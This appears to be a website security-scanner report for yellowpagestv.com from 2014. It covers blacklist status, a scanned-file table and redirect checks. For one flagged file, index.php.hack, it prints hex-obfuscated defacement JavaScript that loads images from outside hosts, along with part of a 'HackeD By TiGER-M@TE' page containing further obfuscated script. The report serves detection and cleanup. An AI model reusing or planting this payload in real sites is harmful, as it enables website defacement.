Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yellowpagestv.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yellowpagestv.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yellowpagestv.com/ | 200 OK Content-Length: 730 Content-Type: text/html | clean |
http://yellowpagestv.com/_archive/ | 200 OK Content-Length: 70 Content-Type: text/html | clean |
http://yellowpagestv.com/test404page.js | 404 Not Found Content-Length: 477 Content-Type: text/html | clean |
http://yellowpagestv.com/_elements/ | 200 OK Content-Length: 1063 Content-Type: text/html | clean |
http://yellowpagestv.com/_elements/AC_RunActiveContent.js | 200 OK Content-Length: 8321 Content-Type: application/javascript | clean |
http://yellowpagestv.com/_elements/am-insights.xml | 200 OK Content-Length: 982 Content-Type: application/xml | clean |
http://yellowpagestv.com/_elements/banner.xml | 200 OK Content-Length: 2951 Content-Type: application/xml | clean |
http://yellowpagestv.com/_elements/imagerotator.swf | 200 OK Content-Length: 43635 Content-Type: application/x-shockwave-flash | clean |
http://yellowpagestv.com/_elements/index.php.hack | 200 OK Content-Length: 12500 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) var _0x9355=["\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x6F\x74\x6F\x6E\x6F\x6E\x73\x2E\x72\x75\x2F\x69\x6D\x61\x67\x65\x73\x2F\x31\x37\x2E\x30\x33\x2E\x31\x31\x2F\x62\x79\x74\x69\x67\x65\x72\x6D\x74\x65\x2E\x6A\x70\x67\x22\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x74\x68\x69\x73\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x6E\x75\x6C\x6C\x3B\x74\x68\x69\x73\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x61\x67\x65\x2E\x62\x61\x79\x69\x6D\x67\x2E\x63\x6F\x6D\x2F\x6D\x61\x65\x61\x64\x61\x61\x64\x69\x2E\x6A\x70\x67\x27\x3B\x22\x20\x2F\x3E","\x77\x72\x69\x74\x65"];if(document[_0x9355[0]]!=_0x9355[1]){exit(0);} ;document[_0x9355[3]](_0x9355[2]); Antivirus reports:
Deface/Content modification. The following signature was found: HackeD By TiGER-M@TE <html><head>
<title>HackeD By TiGER-M@TE</title></head> <style> body { scrollbar-track-color: #000000;scrollbar-darkshadow-color: #000000; scrollbar-face-color: #000000; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #000000; scrollbar-arrow-color: #FFFFFF; color:#8E959E } .name { text-decoration: none;} </style><script>var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x ...[12717 bytes skipped]... | ||
http://yellowpagestv.com/_elements/la-montage.xml | 200 OK Content-Length: 5587 Content-Type: application/xml | clean |
http://yellowpagestv.com/_elements/mediaplayer.swf | 200 OK Content-Length: 34353 Content-Type: application/x-shockwave-flash | clean |
http://yellowpagestv.com/_elements/modieus2.swf | 200 OK Content-Length: 13484 Content-Type: application/x-shockwave-flash | clean |
http://yellowpagestv.com/_elements/nurenex.xml | 200 OK Content-Length: 6589 Content-Type: application/xml | clean |
http://yellowpagestv.com/_elements/player-viral.swf | 200 OK Content-Length: 50120 Content-Type: application/x-shockwave-flash | clean |
http://yellowpagestv.com/_elements/player.swf | 200 OK Content-Length: 50038 Content-Type: application/x-shockwave-flash | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yellowpagestv.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 04:20:25 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4
Content-Length: 730
Content-Type: text/html;charset=ISO-8859-1
...730 bytes of data.
GET / HTTP/1.1
Host: yellowpagestv.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 04:20:25 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4
Content-Length: 730
Content-Type: text/html;charset=ISO-8859-1
...730 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yellowpagestv.com
Referer: http://www.google.com/search?q=yellowpagestv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yellowpagestv.com
Referer: http://www.google.com/search?q=yellowpagestv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.